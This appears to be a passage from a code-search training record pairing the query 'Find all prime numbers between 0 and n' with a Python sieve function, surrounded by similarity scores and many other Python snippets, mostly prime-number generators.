np.minimum(data, float(config['max']))\n\n elif config['distribution'] == 'uniform_int':\n if int(config['min'])==int(config['max']):\n data=int(config['min'])*np.ones((n_sample,),dtype='int32')\n else:\n data=np.random.randint(int(config['min']),high=int(config['max']),size=n_sample)\n\n else:\n log.warning('Warning: unknown distribution type: %s' % config['distribution'])\n data = []\n\n return data", "def generate(ctx, include, host_data_type, encryption_type, match_rate, sparsity, guest_data_size,\n host_data_size, guest_feature_num, host_feature_num, output_path, force, split_host, upload_data,\n remove_data, use_local_data, parallelize, **kwargs):\n ctx.obj.update(**kwargs)\n ctx.obj.post_process()\n namespace = ctx.obj[\"namespace\"]\n config_inst = ctx.obj[\"config\"]\n if ctx.obj[\"extend_sid\"] is not None:\n config_inst.extend_sid = ctx.obj[\"extend_sid\"]\n if ctx.obj[\"auto_increasing_sid\"] is not None:\n config_inst.auto_increasing_sid = ctx.obj[\"auto_increasing_sid\"]\n if parallelize and upload_data:\n upload_data = False\n yes = ctx.obj[\"yes\"]\n echo.welcome()\n echo.echo(f\"testsuite namespace: {namespace}\", fg='red')\n echo.echo(\"loading testsuites:\")\n if host_data_size is None:\n host_data_size = guest_data_size\n suites = _load_testsuites(includes=include, excludes=tuple(), glob=None)\n suites += _load_testsuites(includes=include, excludes=tuple(), glob=None,\n suffix=\"benchmark.json\", suite_type=\"benchmark\")\n for suite in suites:\n if upload_data:\n echo.echo(f\"\\tdataget({len(suite.dataset)}) dataset({len(suite.dataset)}) {suite.path}\")\n else:\n echo.echo(f\"\\tdataget({len(suite.dataset)}) {suite.path}\")\n if not yes and not click.confirm(\"running?\"):\n return\n\n _big_data_task(include, guest_data_size, host_data_size, guest_feature_num, host_feature_num, host_data_type,\n config_inst, encryption_type, match_rate, sparsity, force, split_host, output_path, parallelize)\n if upload_data:\n if use_local_data:\n _config.use_local_data = 0\n _config.data_switch = remove_data\n client_upload(suites=suites, config_inst=config_inst, namespace=namespace, output_path=output_path)", "def create_config(output_dir='my-hls-test', project_name='myproject', backend='Vivado', version='1.0.0', **kwargs):\n backend_list = hls4ml.backends.get_available_backends()\n if backend.lower() not in backend_list:\n raise Exception(f'Unknown backend: {backend}')\n\n backend = hls4ml.backends.get_backend(backend)\n\n backend_config = backend.create_initial_config(**kwargs)\n\n config = {}\n config['OutputDir'] = output_dir\n config['ProjectName'] = project_name\n config['Backend'] = backend.name\n config['Version'] = version\n config.update(backend_config)\n\n return config", "def generate_specs_build(self):\n from django_swagger_utils.drf_server.generators.swagger_generator import SwaggerGenerator\n\n swagger_gen = SwaggerGenerator(self.parser, self.paths, self.app_name)\n # generating request_response files\n swagger_gen.generate_request_response()\n # testing properties\n swagger_gen.generate_definitions()\n # generating global parameters\n swagger_gen.generate_parameters()\n # generating global response\n swagger_gen.generate_responses()\n # generating urls\n swagger_gen.generate_urls()" ]
[ "0.65736026", "0.6416811", "0.6385334", "0.6240616", "0.621911", "0.6212363", "0.60647005", "0.60343623", "0.6023183", "0.6003032", "0.5997811", "0.5997811", "0.59653294", "0.59653294", "0.59533024", "0.5914431", "0.5902483", "0.5882451", "0.5871193", "0.5864147", "0.5847218", "0.5839081", "0.5836898", "0.5834619", "0.582073", "0.5786336", "0.5785289", "0.57823145", "0.576097", "0.57480675", "0.57465434", "0.57460046", "0.5744125", "0.57313526", "0.5718464", "0.57056034", "0.5701618", "0.56960374", "0.5692062", "0.56913054", "0.56815636", "0.56760967", "0.5674879", "0.56707335", "0.5667781", "0.56640786", "0.5661686", "0.5656439", "0.56475204", "0.56166506", "0.561312", "0.55943024", "0.55908144", "0.555876", "0.5557079", "0.5555876", "0.5554873", "0.55521053", "0.5521745", "0.5519078", "0.55014074", "0.55012065", "0.55009127", "0.5488805", "0.5488805", "0.54837096", "0.5460477", "0.54442924", "0.54427665", "0.5440118", "0.54368824", "0.54358417", "0.54348516", "0.54312587", "0.5426974", "0.5425723", "0.5422673", "0.54156065", "0.5412663", "0.5408391", "0.53980654", "0.539291", "0.5392056", "0.53904015", "0.5387984", "0.53866076", "0.53837717", "0.5382952", "0.53799516", "0.53732705", "0.5371816", "0.5371816", "0.5371816", "0.5370965", "0.53687894", "0.5366352", "0.5359429", "0.5359073", "0.5349814", "0.53456074", "0.53331685" ]
0.0
-1
Find all prime numbers between 0 and n
def get_primes(n): primes = [True] * (n / 2) for i in range(int((n / 2 - 1) / 2) >> 1): for j in range((i * (i + 3) << 1) + 3, n / 2, (i << 1) + 3): primes[j] = False return [2] + [((i << 1) + 3) for i in range(n / 2) if (primes[i])]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def primes(n):\n return [i for i in xrange(1, n + 1) if mr_prime(i)]", "def find_n_primes(n):\n primes = [ ]\n\n if n < 2:\n return None;\n\n primes.append(2)\n\n for i in range(3, n + 1, 2):\n is_prime = True\n for p in primes:\n if i % p is 0:\n is_prime = False\n continue\n if is_prime:\n primes.append(i)\n return primes", "def primes(n):\n sqrtN=n**0.5\n odds=[2]\n odds+=[i for i in range(3,n) if i%2>0]\n\n for i in odds:\n if i!=0 and i<=sqrtN:\n for j in odds[odds.index(i)+1:]:\n if j%i==0:\n odds[odds.index(j)]=0\n return [i for i in odds if i!=0]", "def make_primes(n):\n out_list = []\n for i in range(2, n):\n if is_prime(i):\n out_list.append(i)\n return out_list", "def primesupto(n):\n # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def get_primes(n):\n\n return list(primes_sieve(n))", "def primes(n):\n return [i for i, v in enumerate(prime_cache(n)) if v]", "def primes(n, DEBUG=False):\n\n return [x[0] for x in enumerate(_sieve(n, DEBUG=DEBUG)[0:n+1]) if x[1]]", "def primes(n):\n\tsieve = [True] * n\n\tyield 2\n\tfor i in xrange(3,int(n**0.5)+1,2):\n\t\tif sieve[i]:\n\t\t\tyield i\n\t\t\tsieve[i*i::2*i] = [False]*((n-i*i-1)/(2*i)+1)\n\tfor i in xrange(i+2,n,2):\n\t\tif sieve[i]: yield i", "def list_primes(n):\n primeList = []\n for i in range(n):\n if is_prime(i):\n primeList.append(i)\n return primeList", "def primes(n):\n sieve = [True] * n\n for i in range(3, int(n ** 0.5) + 1, 2):\n if sieve[i]:\n sieve[i * i::2 * i] = [False] * int(((n - i * i - 1) // (2 * i) + 1))\n return [2] + [i for i in range(3, n, 2) if sieve[i]]", "def primes(n):\n if n == 0 or n == 1:\n return []\n else:\n p = primes(int(sqrt(n)))\n no_p = { j for i in p for j in xrange(i*2, n+1, i) }\n p = { x for x in xrange(2, n + 1) if x not in no_p }\n return p", "def primes(n):\n sieve = [True] * n\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*int(((n-i*i-1)/(2*i)+1))\n return [2] + [i for i in range(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in range(3, int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in range(3,n,2) if sieve[i]]", "def primes_less(n):\n test_nums = list(range(3, int(floor(sqrt(n))), 2))\n prime_flags = [True] * ((n - 2) // 2)\n for a in test_nums:\n next_div = a**2\n while next_div < n:\n prime_flags[(next_div-3)//2] = False\n next_div += 2*a\n return [2] + [2*i + 3 for i, flag in enumerate(prime_flags) if flag]", "def generate_prime_less_than_n(n):\n\tif n <= 1:\n\t\treturn []\n\tlist_of_primes = [2]\n\tfor i in range(3, n, 2):\n\t\tis_prime = True\n\t\tfor j in list_of_primes:\n\t\t\tif i%j == 0:\n\t\t\t\tis_prime = False\n\t\t\t\tbreak\n\t\tif is_prime:\n\t\t\tlist_of_primes.append(i)\n\treturn list_of_primes", "def sieve(n):\n #All even numbers except 2 are not primes\n primes = [False, False, True] + [True, False] * (n / 2)\n\n #Start with 3\n p = 3\n\n while p*p <= n:\n if primes[p]:\n #p is prime, cross off all multiples of p, starting at the square \n #of p since all smaller multiples have already been crossed off\n d = p*p\n while d <= n:\n primes[d] = False\n d += p\n p += 2\n\n #Build a list of the primes we've found\n return [i for i in range(n) if primes[i]]", "def primesToNumber(n):\r\n sieve = [True] * n\r\n for i in xrange(3,int(n**0.5)+1,2):\r\n if sieve[i]:\r\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\r\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n result = []\n i = 2\n while n > 0:\n if isPrime(i):\n result += [i]\n n -= 1\n i += 1\n return result", "def sieve_of_eratosthenes(n: int) -> List[int]:\n\n prime = [True for i in range(n+1)] #initiate array named prime with all value True, ie everynumber [0,n] are prime\n p = 2\n while (p * p <= n):\n # If prime[p] is not\n # changed, then it is a prime\n if (prime[p] == True): #if any number is prime then its multiple must be composite\n # Update all multiples of p to be not prime \n for i in range(p * p, n+1, p):\n prime[i] = False\n p += 1\n\n\n '''\n till here the status of code is:\n 0:prime\n 1:prime\n 2:prime\n 3:prime\n 5:prime\n 7:prime\n 11:prime\n .\n .\n .\n\n But 0 and 1 are not prime, so we will have to count numbers from 2\n '''\n\n return [i for i, p in enumerate(prime[2:], 2) if p]", "def prime_divisors(n):\r\n\treturn list(set(factors(n)))", "def primes1(n):\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def getNPrime(num):\n prime_numbers = []\n for i in range(num):\n if isPrime(i + 1):\n prime_numbers.append(i)\n return prime_numbers", "def get_probable_prime(n: int) -> [int]:\n return [6*n-1, 6*n+1]", "def sieve(n):\n global primes; lower = len(primes)\n if n+1 > lower:\n primes += [True, False] * ((n-lower)/2+1)\n for i in xrange(3, int(math.sqrt(n)+1), 2):\n if primes[i]:\n for j in xrange(3*i, n+1, 2*i):\n if j >= lower:\n primes[j] = False\n return [i for i, is_prime in enumerate(primes) if is_prime]", "def primi(n):\n numVec = []\n for x in range(n-1):\n numVec.append(x+2)\n for num in numVec[:(n//2-1)]:\n if numVec[num-2] != 0:\n numVec[slice(2*num-2, n-1, num)] = [0]*(n//num-1)\n numVec = [x for x in numVec if x!=0]\n return numVec", "def primes(n):\n sieve = [True]*n\n for p in range(2, n):\n if sieve[p]:\n yield p\n for i in range(p*p, n, p):\n sieve[i] = False", "def primes():\n yield 1\n primes = []\n for n in itertools.count(2):\n if not any(n % p == 0 for p in primes):\n # No divisor found among previous primes\n yield n\n primes.append(n)", "def prime_sieve(n):\n upper_bound = int(math.sqrt(n))\n primes = [True] * (n + 1)\n primes[0] = primes[1] = False\n for i in range(upper_bound + 1):\n if not primes[i]:\n continue\n for j in range(2, n // i + 1):\n if i*j < n:\n primes[i*j] = False\n return primes", "def next_prime(n):\n i = 1\n known_prime = []\n while i < n:\n if is_prime(i, known_prime):\n known_prime.append(i)\n yield i\n i += 1", "def list_primes(n):\n\tarr = [True] * n\n\tarr[0] = False\n\tarr[1] = False\n\tfor i in range(2, int(math.sqrt(n)) + 1):\n\t\tif is_prime(i):\n\t\t\tfor j in range(2 * i, n, i):\n\t\t\t\tarr[j] = False\n\tprimes = []\n\tfor i in range(len(arr)):\n\t\tif arr[i]:\n\t\t\tprimes.append(i)\n\treturn primes", "def primes():\n yield 2\n found = []\n for i in itertools.count(start=3, step=2):\n for p in found:\n if i % p == 0:\n break\n else:\n yield i\n found.append(i)", "def prime_divisors(n):\n\treturn tuple(set(factors(n)))", "def prime_factorization(n):\r\n result = []\r\n for i in xrange(2, n+1):\r\n s = 0;\r\n while n / float(i) == floor(n/float(i)):\r\n n = n / float(i)\r\n s += 1\r\n if s > 0:\r\n for k in range(s):\r\n result.append(i)\r\n if n == 1:\r\n return result", "def primes_below(n):\n L, M = [2], [x for x in range(3, int(n), 2)]\n if n <= 2:\n print('There are no primes below 2')\n return None\n for i in range(3, int(n), 2):\n if M[i // 2 - 1] != 0 and is_prime(i):\n L.append(i)\n for j in range(i, int(n), 2 * i):\n M[j // 2 - 1] = 0\n return L", "def rwh_primes1(n):\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = [True] * int((n/2))\n for i in range(3,int(n**0.5)+1,2):\n if sieve[int(i/2)]:\n sieve[int(i*i/2)::i] = [False] * int(((n-i*i-1)/(2*i)+1))\n return [2] + [2*i+1 for i in range(1,int(n/2)) if sieve[int(i)]]", "def primesfrom2to(n):\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n if n == 1:\n return []\n elif n == 2:\n return []\n elif n == 3:\n return [2]\n elif n == 4:\n return [2, 3]\n elif n == 5:\n return [2, 3]\n sieve = np.ones(n/3 + (n % 6 == 2), dtype=np.bool)\n sieve[0] = False\n for i in xrange(int(n**0.5)/3+1):\n if sieve[i]:\n k = 3 * i + 1 | 1\n sieve[ ((k*k)/3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False\n return map(int, np.r_[2, 3, ((3*np.nonzero(sieve)[0]+1) | 1)])", "def primesfrom2to(n):\n # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = np.ones(n//3 + (n%6==2), dtype=np.bool)\n sieve[0] = False\n for i in range(int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ ((k*k)//3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))//3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def find_prime_permutations(primes, n):\n\n candidates = [int(\"\".join(digits)) for digits in sorted(set(permutations(str(n))))]\n return [c for c in candidates if c in primes]", "def get_n_primes(n):\n\n primes = [' ']\n num = 2\n while len(primes) < n + 1:\n if is_prime(num):\n primes.append(num)\n num += 1\n return primes", "def primesfrom2to(n):\r\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\r\n sieve = np.ones(n/3 + (n%6==2), dtype=np.bool)\r\n sieve[0] = False\r\n for i in xrange(int(n**0.5)/3+1):\r\n if sieve[i]:\r\n k=3*i+1|1\r\n sieve[ ((k*k)/3) ::2*k] = False\r\n sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False\r\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def sieve(n):\n\n results = [1 for _ in range(n+1)]\n results[0], results[1] = 0, 0\n results = [0,0] + [1]*(n - 1)\n len(results)\n div = 2\n\n for i,num in enumerate(results):\n if num:\n k = i * 2\n while k <= n:\n seive[k] = 0\n k+= i\n return [x for (x,y) in enumerate(results) if y]\n\n while div <= n // 2 + 1:\n for i in range(div * div, n+1, div):\n if results[i] == 0:\n continue\n else:\n results[i] = 0\n div += 1\n\n #return sum(results)\n return [i for i in range(len(results)) if results[i] == 1]", "def primesfrom2to(n):\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = np.ones(n/3 + (n%6==2), dtype=np.bool)\n sieve[0] = False\n for i in xrange(int(n**0.5)/3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ ((k*k)/3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def sieve_for_primes_to(n):\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def primes(n_max: int = 100) -> List[int]:\n if n_max < 2:\n raise ValueError\n\n t = list(range(2, n_max + 1))\n for i in t:\n for j in (k for k in t if k > i):\n if j % i == 0:\n t.remove(j)\n\n return sorted(t)", "def primes(n: int) -> list:\n primes = [2]\n pot_primes = list(range(2,n+1))\n for number in pot_primes:\n for prime in primes:\n if number // prime == 0:\n continue\n else:\n primes += [x]\n\n\n print (primes)", "def prime_numpy_version(n: int) -> List[int]:\n arm = range(2, np.floor(n / 2).astype(int) + 1)\n x, y = np.meshgrid(*([arm] * 2))\n\n Z = range(2, n + 1)\n D = x * y\n Diff = np.setdiff1d\n\n P = Diff(Z, D[D <= n].ravel())\n return P.tolist()", "def first_n_primes(n): \n\tlist_of_primes = []\n\t# the current number that we're checking the primality of\n\tcandidate = 2\n\n\t# keep on finding primes until our list has enough elements\n\twhile len(list_of_primes) < n:\n\t\t# assume that we have a prime number\n\t\tis_prime = True\n\n\t\t# use trial division to determine if it's not prime\n\t\tfor i in range(2, candidate):\n\t\t\t# once we know it's not prime, break!\n\t\t\tif candidate % i == 0:\n\t\t\t\tis_prime = False\n\t\t\t\tbreak\n\t\tif is_prime:\n\t\t\tlist_of_primes.append(candidate)\n\t\tcandidate += 1\n\treturn list_of_primes", "def primish(n):\n\n factors = set()\n for i in range(n, 1, -1):\n\n # Find the smallest divisor of i.\n smallest = 2\n while (i % smallest) != 0:\n smallest += 1\n\n # Divide by that divisor until we have 1 or something else.\n remainder = i\n while (remainder % smallest) == 0:\n remainder /= smallest\n\n # Keep it if needed.\n if remainder == 1:\n factors.add(i)\n\n return factors", "def gen_primes(N):\n primes = set()\n for n in range(2, N):\n if all(n % p > 0 for p in primes):\n primes.add(n)\n yield n", "def prime_sieve(n):\n li = [True] * n\n li[0] = li[1] = False\n\n for (i, isprime) in enumerate(li):\n if isprime:\n yield i\n for j in range(i*i, n, i):\n li[j] = False\n return(li)", "def primes_list(n):\n count = 0\n if n <= 7:\n p_list = [2, 3, 5, 7, 11, 13, 17]\n return p_list[:n]\n else:\n upper_bound = int(n * log(n) + n * log(log(n)))\n return primes(upper_bound)[:n]", "def primesList(n):\n sieve = [True]*n\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[2*i::i] = [False]*(len(sieve[2*i::i]))\n return [2]+[i for i in range(3,n,2) if sieve[i]]", "def basic_is_prime(_n):\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None", "def sieve(n):\n\tif n < 2:\n\t\treturn []\n\telse:\n\t\tis_prime = [True] * n\n\t\tis_prime[0] = is_prime[1] = False\n\t\tfor i in range(2, n):\n\t\t\tif is_prime[i]:\n\t\t\t\tyield i\n\t\t\t\tfor num in range(i*i, n, i):\n\t\t\t\t\tis_prime[num] = False", "def rwh_primes1(n):\n sieve = [True] * (n/2)\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i/2]:\n sieve[i*i/2::i] = [False] * ((n-i*i-1)/(2*i)+1)\n return [2] + [2*i+1 for i in xrange(1,n/2) if sieve[i]]", "def primes_from_2_to(n):\n sieve = np.ones(n // 3 + (n % 6 == 2), dtype=bool)\n for i in range(1, int(n ** 0.5) // 3 + 1):\n k = 3 * i + 1 | 1\n sieve[k * k // 3::2 * k] = False\n sieve[k * (k - 2 * (i & 1) + 